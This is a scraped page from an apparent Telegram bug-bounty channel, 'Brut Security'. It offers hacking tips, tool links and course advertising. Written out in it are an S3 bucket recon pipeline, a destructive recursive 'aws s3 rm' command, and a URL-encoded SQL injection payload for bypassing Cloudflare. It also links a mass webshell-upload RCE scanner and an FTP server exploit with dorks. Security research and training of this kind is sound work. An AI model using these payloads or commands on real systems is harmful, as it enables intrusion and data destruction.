Brut Security
14.7K subscribers
919 photos
73 videos
287 files
974 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
🚨 Bug Bounty Tip: Takeover Vulnerable S3 Buckets in Under a Minute! ☁️

Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon

πŸ” Then check for public S3 buckets:
aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com


πŸ‘‰ If the bucket name isn’t obvious:
echo REDACTED.COM | cariddi -e -s -info

⚠️ Found a vulnerable bucket? Don’t delete anything!
# Do NOT run this. Just for awareness:
aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive



βœ… Always report responsibly. Never exploit β€” you're here to help, not harm.

⚑️ Happy Hunting!
❀11πŸ‘7πŸ”₯4πŸ—Ώ2
πŸ›‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

❌ Blocked Payload
(select(0)from(select(sleep(10)))v) β†’ 403 Forbidden

βœ… Bypass Payload

(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)



πŸ” This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.

βœ…Credit: @nav1n0x
❀35πŸ‘5πŸ—Ώ4😁1
Top 25 Recon Tools and their PurposesπŸ“
❀23πŸ‘3
To all my dear students and subscribers,
On this special occasion of Guru Purnima, remember:

🧠 β€œYour knowledge is your antivirus. Your guru is your source code.”

Stay curious, stay humble, and always keep learning.
– With gratitude,
Brut Security
1❀29πŸ‘7🀨2πŸ‘1
❀10
⚑SSTImap - Automatic SSTI detection tool with interactive interface

βœ…
https://github.com/vladko312/SSTImap
❀11πŸ‘3
Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!

βœ… IP & Domain Lookup
βœ… Email & Phone OSINT
βœ… Subdomain Enumeration
βœ… Reverse Image Search
βœ… URL & Virus Scanners
βœ… Temp Email, QR Tools, and more

🌟 You can create and play your own CTF in a minute , right inside Discord!

Try it out now β€” it’s fast, simple, and all in one chat.
πŸ”— https://discord.gg/u7uMFV833h

#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
1🫑8❀4
🚨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.


βœ… Download:
https://github.com/alihussainzada/BugHunterMethodology/
❀11πŸ‘4
⚑CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others

βœ…
https://github.com/spyboy-productions/CloakQuest3r
❀22
This media is not supported in your browser
VIEW IN TELEGRAM
⚑Scanning github repos is a great way to find juicy information, secrets and credentials!

Trufflehog makes this easy.

With one scan you can find AWS keys, FTP creds, crypto keys and more!

βœ…Check this out - https://github.com/trufflesecurity/trufflehog
❀24πŸ”₯7πŸ‘2
dON'T fORGET tO gIVE rEACTIONS
❀25πŸ”₯4🫑2πŸ€”1
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.

βœ…
https://github.com/ill-deed/CVE-2025-34085-Multi-target
πŸ‘6❀4
🚨 CVE-2025-47812: Wing FTP Server Remote Code Execution (RCE) vulnerability

πŸ”₯PoC :
https://github.com/4m3rr0r/CVE-2025-47812-poc

πŸ‘‰Dorks:
HUNTER:
https://product.name="Wing FTP Server"
πŸ”₯11❀4πŸ‘4
😁28❀13πŸ‘3
🚨 New Batch Starting – August 2025 🚨
Brut Practical Web Penetration Testing (bPWP)

We’re back with a fresh batch of our most in-demand training – Brut Practical Web Penetration Testing – starting this August!

πŸ” Learn the art of Web Hacking with:
βœ… 100% Practical Sessions
βœ… Bug Bounty Approach
βœ… Real-World Lab Scenarios
βœ… Lifetime Community Access
βœ… Beginner-Friendly with Advanced Techniques

πŸ’» Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.

πŸ“† Limited Seats – Enroll Now
🌐
https://brutsec.com/bPWP

πŸ“© For Queries:
Telegram:
@wtf_brut
WhatsApp:
https://wa.link/brutsecurity | +918945971332
Email:
[email protected]
❀9😒2πŸ‘1
⚑AllForOne allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories.

🚨https://github.com/AggressiveUser/AllForOne
πŸ”₯19❀4πŸ‘3
⚑Bug Bounty Dorks
βœ…https://dorkking.blindf.com/
❀23πŸ‘5
πŸ‘»SpoofProof helps security professionals detect email domain spoofing vulnerabilities and validate DMARC, SPF, and DKIM configurations, making email security assessments seamless and efficient.

⭐Extension Name: SpoofProof - Domain Spoofing Validation

πŸ”— BApp Store:
https://portswigger.net/bappstore/a321360c6e114b3dab6f2c67d68c241a

πŸ’» Source Code:
https://github.com/portswigger/spoofproof
❀13πŸ”₯5